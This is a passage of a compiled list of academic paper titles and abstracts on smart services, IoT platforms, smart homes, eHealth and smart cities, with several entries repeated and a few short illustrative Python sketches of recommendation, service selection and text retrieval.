basis of a literature review, followed by a case-based analysis of the AMT and servitization challenges to which a machine tool manufacturer is exposed in its industrial market environment. Consequently, the present study identifies a set of contingencies c.q. catalyzers with regard to seizing AMT for smart servitization practices within industrial business-to-business contexts. These are: the ability to capture relevant data; to exploit such data adequately and convert them into actionable knowledge; and to build trust among users and producers of capital goods in order to come to effective data exchange. We finish by deriving implications for smart servitization in a manufacturing context, and by outlining case-based lessons on how AMT and servitization can further interactive design and manufacturing practices in an industrial producer-user setting. We contend that there may be a gap between the technological and organizational readiness of (many) machine tool companies for smart servitization, on the one hand, and what different publications on AMT and Industry 4.0 are trying to make out. 
We also find that besides the high-tech and big data components to smart servitization, companies with an ambition in this field should take into account minimum/right information principles, to actually get to deep learning, and to establish a culture of trust with business partners, and inside implicated organizations among departments to create an environment in which smart servitized user-supplier relationships can prosper. --- paper_title: Framework design for distributed service robotic systems paper_content: Service robot is one of the most promising industries in the future. Modular framework for designing and implementing a distributed service robot system including robot and intelligent environment is proposed. Components as sensors and actuators of a robotic system are standardized in both hardware and software design, resulting in an abstraction of digital smart devices with certain functions. A unified software platform with a core of Service-Oriented Architecture (SOA) middleware is established for the system. It employs the Player toolkit to access smart devices via drivers and interfaces, and the Web Service technology is introduced for automatic collaboration of smart services according to their functions. An implementation of a home-care service robotic system is described with 2D/3D realistic simulation. Experimental results validate the flexibility and open performance of the proposed demo system. --- paper_title: A Smart Hospital Information System for Mental Disorders paper_content: This study aims to build a smart hospital information framework to deal with various medical information. First, a ubiquitous smart hospital information system model under WaaS (Wisdom as a Service) architecture is proposed. With this model, medical information can be organized into different levels. In this model, novel methods of organizing medical information (offline computing) and smart services delivering (online computing) are defined. The methods are used to supply medical knowledge recommendation services to patients according to their personalized condition and context. As a use case, a smart medical knowledge recommendation system, namely SKeWa, was built to reveal the usefulness of the model and the methods.
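As a rough illustration of the condition- and context-driven recommendation idea in the smart hospital entry above, the following Python sketch filters a toy knowledge base by patient condition and ranks items by context overlap. The item structure and scoring are assumptions; the SKeWa system itself is not specified at this level of detail in the abstract.

```python
# Toy sketch of condition- and context-aware knowledge recommendation.
# Knowledge items, tags and the overlap-based ranking are invented placeholders.

KNOWLEDGE_BASE = [
    {"id": "K1", "conditions": {"depression"}, "context": {"home", "evening"},
     "text": "Sleep-hygiene guidance for patients with depressive symptoms."},
    {"id": "K2", "conditions": {"anxiety"}, "context": {"work"},
     "text": "Short breathing exercise suitable for workplace breaks."},
    {"id": "K3", "conditions": {"depression", "anxiety"}, "context": {"home"},
     "text": "General relapse-prevention checklist."},
]

def recommend(condition, context_tags, top_k=2):
    """Keep items matching the condition, rank by overlap with the current context."""
    matching = [item for item in KNOWLEDGE_BASE if condition in item["conditions"]]
    matching.sort(key=lambda item: len(item["context"] & context_tags), reverse=True)
    return matching[:top_k]

if __name__ == "__main__":
    for item in recommend("depression", {"home", "evening"}):
        print(item["id"], "-", item["text"])
```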
--- paper_title: Applications of big data to smart cities paper_content: Many governments are considering adopting the smart city concept in their cities and implementing big data applications that support smart city components to reach the required level of sustainability and improve the living standards. Smart cities utilize multiple technologies to improve the performance of health, transportation, energy, education, and water services leading to higher levels of comfort of their citizens. This involves reducing costs and resource consumption in addition to more effectively and actively engaging with their citizens. One of the recent technologies that has a huge potential to enhance smart city services is big data analytics. As digitization has become an integral part of everyday life, data collection has resulted in the accumulation of huge amounts of data that can be used in various beneficial application domains. Effective analysis and utilization of big data is a key factor for success in many business and service domains, including the smart city domain. This paper reviews the applications of big data to support smart cities. It discusses and compares different definitions of the smart city and big data and explores the opportunities, challenges and benefits of incorporating big data applications for smart cities. In addition it attempts to identify the requirements that support the implementation of big data applications for smart city services. The review reveals that several opportunities are available for utilizing big data in smart cities; however, there are still many issues and challenges to be addressed to achieve better utilization of this technology. --- paper_title: Internet of Things for a Smart and Ubiquitous eHealth System paper_content: Connected data has always been considered as a primary source to knowledge. Internet of Things uses the virtue of connecting this data from different entities and creates a pool of knowledge for providing smart services to users, based on rigorous analysis and processing over the knowledge. The communication in this context scales to not only between machine to machine but also between a large number of heterogeneous entities and persons. This genius technology of Internet of Things holds paramount importance and application in healthcare technologies. Considering health technologies, a large number of devices generate huge amount of data related to a patient. Assimilating the data from heterogeneous sources and using it to generate intelligence is one of the primary tasks in a smart environment. In the context of eHealth, Internet of Things is of immense importance since connected data about patient would facilitate treatment with more efficiency and comprehensive knowledge. Virtually storing the patient data and making it ubiquitously accessible to concerned healthcare personnel would be the first step toward mutual knowledge sharing. Another important aspect of using this connected data is the design of an intelligent clinical decision support system which would assist the doctors in every possible way during the treatment phase. A model has been proposed with an inclusive approach of Internet of Things in eHealth scenario for a smart medical environment and providing ubiquitous services at its best. Several issues pertaining to the system has also been discussed accordingly. Nevertheless, the enormous spread of Internet of Things for efficient and intelligent healthcare services holds quite inevitable. 
Rather it adds to the foundation notion of ubiquitous services by making available to everyone and everywhere. The new age eHealth facilities are expected to enable end-to-end monitoring systems even at remote scenarios, helping medical services reach the unreached. --- paper_title: Scalable real-time monitoring system for ubiquitous smart space paper_content: Scalable real-time monitoring is one of important requirements to supply smart services for customers, on time, in ubiquitous smart space. We propose a scalable real-time monitoring method to aggregate large amounts of data from various sensor devices distributed over different domain areas. The real-time monitoring scheme can process data from sensor devices within deadline and is scalable based on the number of sensor devices. The scalability of monitoring can be improved by employing a hierarchical monitoring agent for sensor devices while still satisfying the data deadlines. Simulation results show that our real-time monitoring scheme can improve the met deadline ratio up to 27% compared to the previous schemes. --- paper_title: QoS based framework for ubiquitous robotic services composition paper_content: With the growing emergence of ubiquitous computing and networked systems, ubiquitous robotics is becoming an active research domain. The issue of services composition to offer seamless access to a variety of complex services has received widespread attention in recent years. The majority of the proposed approaches have been inspired from the research undertaken jointly on Workflow and AI-based classical planning techniques. However, the traditional AI-based methods assume that the environment is static and the invocation of the services is deterministic. In ubiquitous robotics, services composition is a challenging issue when the execution environment and services are dynamic and the knowledge about their state and context is uncertain. The services composition requires taking into account the parameters of quality of service (QoS) to adapt the composed service to context of the user and the environment, in particular, dealing with failures such as: service invocation failures, network disconnection, sensor failures, context change due to mobility of objects (robots, sensors, etc.), service discovery failures and service execution failures. In this paper, we present a framework which gives ubiquitous robotic system the ability to dynamically compose and deliver ubiquitous services, and to monitor their execution. The main motivation behind the use of services composition is to decrease time and costs to develop integrated complex applications using robots by transforming them from a single task issuer to smart services provider and human companion, without rebuilding each time the robotic system. To address these new challenges, we propose in this paper a new framework for services composition and monitoring, including QoS estimation and Bayesian learning model to deal with the dynamic and uncertain nature of the environment. This framework includes three levels: abstract plan construction, plan execution, and services discovery and re-composition. This approach is tested under USARSim simulator on a prototype of ubiquitous robotic services for assisting an elderly person at home. The obtained results from extensive tests demonstrate clearly the feasibility and efficiency of our approach. --- paper_title: Smart services for home automation. managing concurrency and failures: New wine in old bottles ? 
paper_content: Home automation represents a growing market in the industrialized world. Today's systems are mainly based on ad hoc and proprietary solutions, with little to no interoperability and smart integration. However, in a not so distant future, devices installed in our home will be able to smartly interact and integrate in order to offer complex services with rich functionalities. Realizing this kind of integration pushes developers to increase the amount of abstraction within the software architecture. In this paper we give a high-level view of the inherent trade-offs that stem from this process of abstraction and suggest how they could be tackled in these complex home automation systems. More specifically, we focus our analysis on two problems: concurrent execution of multiple plans and failure detection. --- paper_title: Service-oriented networking platform on smart devices paper_content: This study presents the design of a service-oriented networking platform to offer dynamic networking services in support of mobile group communications among connected smart devices. This platform enables users to access smart services anywhere and anytime with embedded devices while satisfying their requirements for various smart services. The proposed platform adopts the Session Initiation Protocol (SIP) as its service signalling protocol, which provides high extensibility and compatibility with existing service systems. The overlay network structure suggested in our platform provides the advantage of building a scalable and dynamic service network based on multiple smart zones. Furthermore, the quality of end-to-end service in dynamic network environments is guaranteed by virtue of the smart delivery scheme in the platform. --- paper_title: Exploring Platform Adoption in the Smart Home Case paper_content: Smart home (SH) services promote the comfort, convenience, security, entertainment, healthcare, education and communication of people in their home environments. Despite the radical enhancements envisioned for people's lives, the SH market has remained a niche for more than three decades. Yet, recent fast-paced developments, including ubiquitous computing, miniaturization of microelectronic components and digitalization of societies, have spurred a new wave of interest in a field populated by various technology platforms battling for dominance. In this light, we explore the determinants for widespread adoption of SH platforms informed by 21 experts from 19 companies. Our qualitative content analysis identifies, classifies, ranks and describes 34 determinants and yields a theoretical model on SH platform adoption. As such, we provide a basis for further research on platform ecosystems and managerial implications on platform design and governance in the SH field. In particular, we highlight the technical and organizational openness and the legitimacy of sponsorship.
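The QoS-based composition entry above (for ubiquitous robotic services) combines QoS estimation with Bayesian learning to cope with unreliable services. The sketch below shows only that core idea in Python, using a Beta-Bernoulli estimate of each candidate service's success probability to drive re-composition; the plan levels, QoS parameters and service names are illustrative assumptions rather than the paper's framework.

```python
# Minimal sketch of Bayesian QoS learning for service selection. Each candidate
# service's invocation success probability is tracked with a Beta distribution
# updated from observed outcomes; composition then prefers the most reliable one.

class ServiceReliability:
    """Beta-Bernoulli estimate of a service's invocation success probability."""

    def __init__(self, name, alpha=1.0, beta=1.0):
        self.name = name
        self.alpha = alpha  # pseudo-count of successes
        self.beta = beta    # pseudo-count of failures

    def update(self, success):
        if success:
            self.alpha += 1.0
        else:
            self.beta += 1.0

    def expected_success(self):
        return self.alpha / (self.alpha + self.beta)

def select_service(candidates):
    """Pick the candidate with the highest expected success probability."""
    return max(candidates, key=lambda s: s.expected_success())

if __name__ == "__main__":
    camera_a = ServiceReliability("ceiling_camera")
    camera_b = ServiceReliability("robot_camera")
    # Simulated invocation history: camera_a fails often, camera_b is mostly reliable.
    for outcome in (False, False, True, False):
        camera_a.update(outcome)
    for outcome in (True, True, True, False, True):
        camera_b.update(outcome)
    best = select_service([camera_a, camera_b])
    print(f"Recompose plan using: {best.name} "
          f"(estimated success {best.expected_success():.2f})")
```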
--- paper_title: Identifying enablers for future e-Services paper_content: The starting point of the project is the observation that new information and communication technologies (ICT) are often introduced without taking into account the requirements of elderly and/or disabled users, resulting in products and services that are hardly usable by those users. A method for identifying enablers for future e-Services is described. In short, it identifies usability problems with future interaction technologies and maps these future interaction technologies to e-Services. The results of investigations using this method allow stakeholders in different stages of the research and development lifecycle of e-Services to spot potential difficulties in the design of user interfaces which could cause elderly or disabled users to experience usability issues. --- paper_title: Knowledge Extraction and Reuse within "Smart" Service Centers paper_content: In this paper, we describe the initial version of a text analytics system under development and use at Cisco, where the objective is to "optimize" the productivity and effectiveness of the service center. More broadly, we discuss the practical needs in industry for developing powerful "Smart" Service Centers and the gaps in research to meet these needs. Ideally, service engineers in service centers should be utilized to handle issues which have not been solved previously and machines should be used to solve problems already solved, or at least help the service engineers obtain pertinent information from related and solved service cases when responding to a new request. Such a role for a machine would be a core element of the "Smart Services" offering.
Hence, the design of a highly efficient human-machine combination to derive insights from text and respond to a user request is critical and fundamental; it enables service agents to capture relevant information quickly and accurately, and to develop the foundation for upper-layer applications. Despite extensive earlier literature, the optimization of a service process that involves very long, unstructured documents referencing a number of technology and product related terms with implicit inter-relationships has not been fully investigated. Our approach enables firms such as Cisco to achieve efficient service delivery by automating knowledge extraction to support "Self Service" by end users. The Cisco text analytics system termed Service Request Analyzer and Recommender (SRAR) addresses gaps in the Support Services function, by optimizing the use of human resources and software analytics in the service delivery process. The Analyzer is able to handle complex service requests (SRs) and to present categorized and pertinent information to service agents, based on which the Recommender, an upper-layer application, is built to retrieve similar solved SRs when presented with a new request. Our contributions in the context of text analysis and system design are three-fold. First, we identify the elements of the diagnostic process underlying the creation of SRs, and design a hierarchical classifier to decompose the complex SRs into those elements. Such decomposition provides specific information from the functional perspectives about "What was the problem?" "Why did it occur?" and "How was it solved?", which assists service agents in acquiring the knowledge they need more effectively and rapidly. Second, we build an SR Recommender on top of the SR Analyzer to extend the system functionality for improved knowledge reuse and to measure SR similarity for more accurate recommendation of SRs. Third, we validate our SRAR in an initial pilot study in the service center for Cisco network diagnostics and support, and demonstrate the effectiveness and extensibility of our system. Our system appears applicable to service centers across multiple domains, including networks, aerospace, semiconductors, automotive, health care, and financial services, and could potentially be adapted and expanded to all the other business functions of an enterprise. We conclude by indicating open research problems and new research directions, to expand the set of problems that need to be addressed in developing a Smart Support Services capability, and the solutions required to achieve them. These include the capture, retrieval, and reuse of more refined, structured and granulated knowledge, as well as the use of forum threads and semi-automated, dynamic categorization, together with considerations of the optimal use of humans and machine-learning-based software. Other aspects we discuss include recommendation systems based on temporal pattern clustering and incentives for experts to permit their expertise to be captured for machine (re-)use.
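The SRAR entry above retrieves similar solved service requests for a new one, but the abstract does not state which similarity model is used. The following sketch shows one plausible baseline in Python, TF-IDF vectors with cosine similarity via scikit-learn; the example requests are invented placeholders.

```python
# Sketch of similar-service-request retrieval: a standard TF-IDF / cosine-similarity
# baseline stands in for whatever similarity model the actual SRAR system uses.

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

solved_requests = [
    "Router reboots intermittently after firmware upgrade on WAN interface",
    "VPN tunnel drops every few hours, logs show phase 2 renegotiation failures",
    "Switch port stuck in err-disabled state after power outage",
]

new_request = "After upgrading firmware the router keeps rebooting unexpectedly"

vectorizer = TfidfVectorizer(stop_words="english")
matrix = vectorizer.fit_transform(solved_requests + [new_request])

# Similarity of the new request (last row) against all previously solved ones.
similarities = cosine_similarity(matrix[-1], matrix[:-1]).ravel()

ranked = sorted(zip(similarities, solved_requests), reverse=True)
for score, text in ranked:
    print(f"{score:.2f}  {text}")
```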
This paper introduces the formulation of an open source integrated intelligent platform as solution for integrating global sensor networks, providing design principles for cloud-based intelligent environments and discuss infrastructure functional modules and their implementation. This paper review briefly technologies enabling the framework, towards emphasizes on demand establishment of smart cities services based on the automated formulation of ubiquitous intelligence of Internet connected objects. The framework introduced founds on the GSN infrastructure. The framework leverages W3C SSN-XG formal language and the IETF COAP protocol, providing support for enabling intelligent (sensors-objects) services. The service requirements for particular smart city scenario are introduced and initial implementations and results from performed simulations studied and discussed. --- paper_title: Cloud semantic-based dynamic multimodal platform for building mhealth context-aware services paper_content: Currently, everybody wish to access to applications from a wide variety of devices (PC, Tablet, Smartphone, Set-top-box, etc.) in situations including various interactions and modalities (mouse, tactile screen, voice, gesture detection, etc.). At home, users interact with many devices and get access to many multimedia oriented documents (hosted on local drives, on cloud storage, online streaming, etc.) in various situations with multiple (and sometimes at the same time) devices. The diversity and heterogeneity of users profiles and service sources can be a barrier to discover the available services sources that can come from anywhere from the home or the city. The objective of this paper is to suggest a meta-level architecture for increasing the high level of context concepts abstracting for heterogeneous profiles and service sources via a top-level ontology. We particularly focus on context-aware mHealth applications and propose an ontologies-based architecture, OntoSmart (a top-ONTOlogy SMART), which provides adapted services that help users to broadcast of multimedia documents and their use with interactive services in order to help in maintaining old people at home and achieving their preferences. In order to validate our proposal, we have used Semantic Web, Cloud and Middlewares by specifying and matching OWL profiles and experiment their usage on several platforms. --- paper_title: Prototyping Smart City applications over large scale M2M testbed paper_content: Many cities around the globe are adopting the use of Information and Communication Technology (ICT) as part of a strategy to transform into Smart Cities. These will allow cities in the developing world to cope with the ever increasing demand for services such as an effective electricity supply, healthcare and water management. Machine-to-Machine (M2M) communication standards play a vital role in enabling the development of Smart Cities by supporting new innovative services. Although Smart City services offer an exciting future, many challenges still have to be addressed in order to allow for mainstream adoption. This work focuses on issues related to prototyping Smart City services that utilize standardised M2M middleware platforms. In addition, the use of an inter-continental testbed for Smart City applications as an enabler for innovative, automated and interactive services is presented. 
The services developed will use an architecture which is based on the Smart City framework developed as part of the Testbeds for Reliable Smart City Machine-to-Machine Communication (TRESCIMO) project. These services will also serve as means to validate the use of Smart services within an African City's context. In addition, the architecture is validated by taking into account various real world use cases for Smart City applications. --- paper_title: Framework design for distributed service robotic systems paper_content: Service robot is one of the most promising industries in the future. Modular framework for designing and implementing a distributed service robot system including robot and intelligent environment is proposed. Components as sensors and actuators of a robotic system are standardized in both hardware and software design, resulting in an abstraction of digital smart devices with certain functions. A unified software platform with a core of Service-Oriented Architecture (SOA) middleware is established for the system. It employs the Player toolkit to access smart devices via drivers and interfaces, and the Web Service technology is introduced for automatic collaboration of smart services according to their functions. An implementation of a home-care service robotic system is described with 2D/3D realistic simulation. Experimental results validate the flexibility and open performance of the proposed demo system. --- paper_title: Towards Smart Service Networks: An Interdisciplinary Service Assessment Metrics paper_content: Service Networks (SNs) are open systems accommodating the co-production of new knowledge and services through organic peer-to-peer interactions. Key to broad success of SNs in practice is their ability to foster and ensure a high performance. By performance we mean the joint effort of tremendous interdisciplinary collaboration, cooperation and coordination among the network participants. However, due to the heterogeneous background of such participants (i.e., business, technical, etc.), different interpretations of the shared terminology are likely to happen. Thus, confusion may appear in the multi-disciplinary communication of SNs participants which in turn may lead to performance anomalies. To deal with such a problem, we propose a novel framework of bi-dimensional (business vs technical) performance metric indicators built on the basis of a systems thinking mindset. By using our framework, a holistic picture of the multiple dimensions and structure of SNs is provided, so that the interdisciplinary service participants have a correct understanding of the service scope and required resources in operation. Moreover, and most importantly, it provides a way to examine the performance traceability of the services within a SN. --- paper_title: A Socio-Technical Approach to Study Consumer-Centric Information Systems. paper_content: Given the unprecedented role of digital service platforms in private life, this research sets out to identify the mechanisms that are designed into information systems with the purpose to increase consumer centricity. We evaluate the consumer centricity of an information system against three reflective indicators, that is the degree of need orientation, value co-creation and relationship orientation and conceptualize consumer centricity as the ability to align social and technical information system components. 
We employ a positivist, explanatory case study approach to test three hypotheses on system component alignment in cases from three domains (gaming, social networking, and video sharing). We found preliminary evidence for three alignment mechanisms that increase consumer centricity. With this research, we plan to contribute to the literature on consumer-centric information systems by elaborating and empirically grounding a socio-technical approach to study mechanisms and their joint application to increase consumer centricity in information systems. --- paper_title: Adaptive blurring of sensor data to balance privacy and utility for ubiquitous services paper_content: Given the trend towards mobile computing, the next generation of ubiquitous "smart" services will have to continuously analyze surrounding sensor data. More than ever, such services will rely on data potentially related to personal activities to perform their tasks, e.g. to predict urban traffic or local weather conditions. However, revealing personal data inevitably entails privacy risks, especially when data is shared with high precision and frequency. For example, by analyzing precise electric consumption data, it can be inferred whether a person is currently at home; at the same time, this can empower new services such as a smart heating system. Access control (forbid or grant access) or anonymization techniques are not able to deal with such a trade-off, because they either completely prohibit access to data or lose source traceability. Blurring techniques, by tuning data quality, offer a wide range of trade-offs between privacy and utility for services. However, the number of ubiquitous services and their data quality requirements leads to an explosion of possible configurations of blurring algorithms. To manage this complexity, in this paper we propose a platform that automatically adapts (at runtime) blurring components between data owners and data consumers (services). The platform searches for the optimal trade-off between service utility and privacy risks using multi-objective evolutionary algorithms to adapt the underlying communication platform. We evaluate our approach on a sensor network gateway and show its suitability in terms of i) effectiveness in finding an appropriate solution, and ii) efficiency and scalability. --- paper_title: The next industrial revolution: Integrated services and goods paper_content: The outputs or products of an economy can be divided into services products and goods products (due to manufacturing, construction, agriculture and mining). To date, the services and goods products have, for the most part, been separately mass produced. However, in contrast to the first and second industrial revolutions which respectively focused on the development and the mass production of goods, the next — or third — industrial revolution is focused on the integration of services and/or goods; it is beginning in this second decade of the 21st Century. The Third Industrial Revolution (TIR) is based on the confluence of three major technological enablers (i.e., big data analytics, adaptive services and digital manufacturing); they underpin the integration or mass customization of services and/or goods. As detailed in an earlier paper, we regard mass customization as the simultaneous and real-time management of supply and demand chains, based on a taxonomy that can be defined in terms of its underpinning component and management foci.
The benefits of real-time mass customization cannot be over-stated as goods and services become indistinguishable and are co-produced — as "servgoods" — in real-time, resulting in an overwhelming economic advantage to the industrialized countries where the consuming customers are at the same time the co-producing producers. --- paper_title: Design of emerging digital services: a taxonomy paper_content: There has been a gigantic shift from a product based economy to one based on services, specifically digital services. From every indication it is likely to be more than a passing fad, and the changes these emerging digital services represent will continue to transform commerce and have yet to reach market saturation. Digital services are being designed for and offered to users, yet very little is known about the design process behind these developments. Is there a science behind designing digital services? By examining 12 leading digital services, we have developed a design taxonomy to be able to classify and contrast digital services. What emerged in the taxonomy were two broad dimensions: a set of fundamental design objectives and a set of fundamental service provider objectives. This paper concludes with an application of the proposed taxonomy to three leading digital services. We hope that the proposed taxonomy will be useful in understanding the science behind the design of digital services. --- paper_title: Strategies in Smart Service Systems Enabled Multi-sided Markets: Business Models for the Internet of Things paper_content: Internet of Things has the potential to disrupt industries through changing products, services, and business models just as the Internet did in the '90s. Machine-to-machine communication is at the core of Internet of Things. Machines that we interact with in everyday life will start interacting with each other, collect data, and even use advances in data technologies to make decisions for us. Organizations, in order to achieve the highest profit, should also redesign their business service models conscientiously around externalities across markets that link through platforms and be specific about which markets to serve. In this research, we aim to build business ownership strategies to further two-sided markets and platforms literature. Herein, we focus on a number of business service models that link four sides of a market, and compare the advantages and disadvantages of network externalities generated by Internet of Things in each model. --- paper_title: Global Sensor Modeling and Constrained Application Methods Enabling Cloud-Based Open Space Smart Services paper_content: The deployment and provisioning of intelligent systems and utility-based services will greatly benefit from a cloud-based intelligent middleware framework, which could be deployed over multiple infrastructure providers (such as smart cities, hospitals, campus and private enterprises, offices, etc.) in order to deliver on-demand access to smart services. This paper introduces the formulation of an open source integrated intelligent platform as a solution for integrating global sensor networks, providing design principles for cloud-based intelligent environments, and discusses infrastructure functional modules and their implementation. The paper briefly reviews the technologies enabling the framework, with emphasis on the on-demand establishment of smart city services based on the automated formulation of ubiquitous intelligence of Internet-connected objects.
The introduced framework is founded on the GSN infrastructure. The framework leverages the W3C SSN-XG formal language and the IETF CoAP protocol, providing support for enabling intelligent (sensor-object) services. The service requirements for a particular smart city scenario are introduced, and initial implementations and results from the performed simulations are studied and discussed. --- paper_title: Integration of wireless and data technologies for personalized smart applications paper_content: Wireless radio-based communication technologies have drastically evolved over the past decades to deliver lower cost, higher efficiency, enhanced quality of experience and diversified smart services (e.g., ambient assisted living, smart grid, e-health). The future development of these technologies faces multi-fold challenges, which are determined by the complexity of the myriad of emerging user and usage scenarios, the scarcity of radio spectrum (licensed and unlicensed), and the quest for user-friendly, data-intensive and security-sensitive technology and applications. This paper outlines the challenges and trends around the integration and development of smart wireless and data technologies, also in relation to standardization. Further, this integration is studied for a specific e-Health scenario in terms of application and usage requirements, involved technologies and required enablers and standardization needs. --- paper_title: Implementation of smart home service over web of object architecture paper_content: Until now, the Internet has mainly been a place for humans, as producers or consumers, to share information. In the future, not only human-generated information but also things will be connected to the Internet, and this will evolve into the Internet of Things (IoT), in which things can share information about themselves and their environment. This paper proposes a service platform that provides web-based IoT services and supports service orchestration and composition through device objectification, and describes implementation results of a smart home service built with things over a web-of-objects architecture. --- paper_title: The identification of new service opportunities: a case-based morphological analysis paper_content: Typically, firms try to differentiate their products through the integration of innovative services. For this reason, much recent research into new service development has focused on methods of identifying and generating new service ideas. The most prevalent method for generating a new service is a morphological analysis that decomposes a system into several dimensions and values, and then recombines those values to generate new services. Despite the popularity of morphological analysis, how to build the morphological matrix has been an area of subjective expert judgment. In this paper, we focus on the possibility of utilizing big data in morphological analysis to address the subjective matrix-building process, by suggesting a case-based morphological analysis. By employing case-based reasoning and network analysis, firms can easily identify direct and indirect clues for new services and integrate these results into the morphological building process. To support this approach, this study first employs a case-based reasoning strategy to collect and identify similar services, and then assesses the patterns in those services through network analysis.
By engaging in network analysis, firms can identify key aspects of new services, and determine what kinds of keywords or aspects should be employed for the dimensions and values of morphological matrices. --- paper_title: Interoperable eHealth platform for personalized smart services paper_content: Independent living is one of the main challenges linked to an increasing ageing population and concerns both patients and healthy elderlies. A lot of research has focused on the area of ambient-assisted living (AAL) technologies towards an intelligent caring home environment able to offer personalized context-aware applications to serve the user's needs. This paper proposes the use of advised sensing, context-aware and cloud-based lifestyle reasoning to design an innovative eHealth platform that supports highly personalized smart services to primary users. The architecture of the platform has been designed in accordance with the interoperability requirements and standards as proposed by ITU-T and Continua Alliance. In particular, we define the interface dependencies and functional requirements needed, to allow eCare and eHealth vendors to manufacture interoperable sensors, ambient and home networks, telehealth platforms, health support applications and software services. Finally, data mining techniques in relation to the proposed architecture are also proposed to enhance the overall AAL experience of the users. --- paper_title: Cloud semantic-based dynamic multimodal platform for building mhealth context-aware services paper_content: Currently, everybody wish to access to applications from a wide variety of devices (PC, Tablet, Smartphone, Set-top-box, etc.) in situations including various interactions and modalities (mouse, tactile screen, voice, gesture detection, etc.). At home, users interact with many devices and get access to many multimedia oriented documents (hosted on local drives, on cloud storage, online streaming, etc.) in various situations with multiple (and sometimes at the same time) devices. The diversity and heterogeneity of users profiles and service sources can be a barrier to discover the available services sources that can come from anywhere from the home or the city. The objective of this paper is to suggest a meta-level architecture for increasing the high level of context concepts abstracting for heterogeneous profiles and service sources via a top-level ontology. We particularly focus on context-aware mHealth applications and propose an ontologies-based architecture, OntoSmart (a top-ONTOlogy SMART), which provides adapted services that help users to broadcast of multimedia documents and their use with interactive services in order to help in maintaining old people at home and achieving their preferences. In order to validate our proposal, we have used Semantic Web, Cloud and Middlewares by specifying and matching OWL profiles and experiment their usage on several platforms. --- paper_title: A software framework for enabling smart services paper_content: ‘Smart’ becomes a buzzword in many sectors of the society. Among them, Smart Service is an emerging paradigm for delivering services with ‘smartness’ features. A key ingredient of smart services is various types of contexts including mobile and social contexts. With the advent of sensor technology and availability in mobile devices, contexts become a key source of information from which situations can be inferred. And, situation-specific services have a high potential of being smart services. 
However, a number of fundamental technical issues remain unresolved, especially in the area of software framework for developing and deploying smart services. In this paper, we present a software framework for context-aware smart life services, Smart Service Framework (SSF). We begin by defining smart services with key characteristics, and define our architectural design of the SSF. We also define a process for provisioning smart services. And, we specify guidelines and algorithms needed for carrying out the four activities in the process. --- paper_title: Scalable analysis of collective behaviour in smart service systems paper_content: The long term vision of smart service systems in which electronic environments are made sensitive and responsive to the presence of, possibly many, people is gradually taking shape through a number of pilot projects. The purposes of such systems vary from intelligent homes that assist their inhabitants to make their lives more independent and comfortable to much larger environments such as airports in which people are provided with context aware, personalised, adaptive and anticipatory services that are most relevant for them given their location and their current activities. This paper is concerned with the exploration of scalable formal models that can address the collective behaviour of a large number of people moving through a smart environment. --- paper_title: Digital assistance services for emergency situations in personalized mobile healthcare: Smart space based approach paper_content: Recent progress in technologies of the Internet of Things (IoT) enables advanced scenarios for mobile healthcare (m-Health). In this paper, we consider the service intelligence in m-Health (so called smart services). On the one hand, such a service utilizes the telemedicine approach when existing healthcare services (located in hospital) are delivered to remote patients (out of hospital). On the other hand, construction and delivery of a smart service benefit from additional intelligence attributes, beyond a fixed set of healthcare services of a given medical information system. For this promising class of m-Health services, we introduce reference scenarios of personalized assistance for a mobile patient with focus on emergency cases. Our development employs the smart spaces paradigm: patients, medical personnel, healthcare services, and other participants operate within a common networked computing environment and interact by sharing information and its semantics. We contribute design solutions to construct services as smart m-Health spaces. --- paper_title: Service-oriented networking platform on smart devices paper_content: This study presents the design of a service-oriented networking platform to offer dynamic networking services in support of mobile group communications among connected smart devices. This platform enables users to access smart services anywhere and anytime with embedded devices while satisfying their requirements of various smart services. The proposed platform adopts a session initiation protocol (SIP) protocol as service signalling protocol that provides high extensibility and compatibility with an existing service system. The overlay network structure suggested in our platform provides an advantage of building a scalable and dynamic service network based on multiple smart zones. Furthermore, the quality of end-to-end service in dynamic network environments is guaranteed by virtue of the smart delivery scheme in the platform. 
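The smart-spaces interaction model referenced in the m-Health entries above (knowledge processors sharing information and its semantics through a common space) can be sketched as follows. This is a minimal, hypothetical illustration: the SmartSpace class, its methods, and the triples are editorial assumptions, not the Smart-M3 API.

```python
# Minimal illustrative sketch of a shared "smart space": knowledge processors
# (agents) publish triples and receive callbacks on matching subscriptions.
# Hypothetical names; this is NOT the Smart-M3 API.
from collections import defaultdict

class SmartSpace:
    def __init__(self):
        self.triples = set()                     # (subject, predicate, object)
        self.subscriptions = defaultdict(list)   # predicate -> list of callbacks

    def subscribe(self, predicate, callback):
        self.subscriptions[predicate].append(callback)

    def insert(self, subject, predicate, obj):
        self.triples.add((subject, predicate, obj))
        for cb in self.subscriptions[predicate]:
            cb(subject, predicate, obj)          # notify interested processors

# Example: an alert processor reacts when a patient agent publishes an emergency flag.
space = SmartSpace()
space.subscribe("hasEmergency", lambda s, p, o: print(f"Dispatch first aid to {s}"))
space.insert("patient:42", "hasEmergency", "true")
```

A real deployment would add persistence, access control, and semantic (SPARQL-like) pattern matching on top of this bare interaction pattern.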
--- paper_title: Scalable real-time monitoring system for ubiquitous smart space paper_content: Scalable real-time monitoring is one of important requirements to supply smart services for customers, on time, in ubiquitous smart space. We propose a scalable real-time monitoring method to aggregate large amounts of data from various sensor devices distributed over different domain areas. The real-time monitoring scheme can process data from sensor devices within deadline and is scalable based on the number of sensor devices. The scalability of monitoring can be improved by employing a hierarchical monitoring agent for sensor devices while still satisfying the data deadlines. Simulation results show that our real-time monitoring scheme can improve the met deadline ratio up to 27% compared to the previous schemes. --- paper_title: IT’S NOT ABOUT HAVING IDEAS – IT’S ABOUT MAKING IDEAS HAPPEN! FOSTERING EXPLORATORY INNOVATION WITH THE INTRAPRENEUR ACCELERATOR paper_content: Organizations usually strive for innovation to achieve economic growth. Thereby, incremental innovation of e.g., existing products is often the most attractive way because it is plannable to a certain extent and often reveals short-term success. However, many markets change due to new competitive structures caused by the rise of digital services, which facilitates market entries of new companies. For an incumbent firm trying to cope with these competitors, exploitation of existing ideas and technologies (i.e., incremental innovation) is not enough. Although these firms usually pay minor attention to it, they need to additionally explore how to establish disruptive innovation that complements or even changes their traditional business model before competitors do. In this contribution, we present a novel structure to foster exploratory innovation within incumbent organizations by unleashing the innovative potential of intrapreneurs as peripheral innovators: the Intrapreneur Accelerator. We consider this novel structure a service system for supporting intrapreneurs to develop and implement extraordinary ideas and thus fostering exploratory innovation for the organization. Using a design science approach, we will further present our methodology and our preliminary results, since we have already conducted two of four design iterations. --- paper_title: Exploring Platform Adoption in the Smart Home Case paper_content: Smart home (SH) services promote the 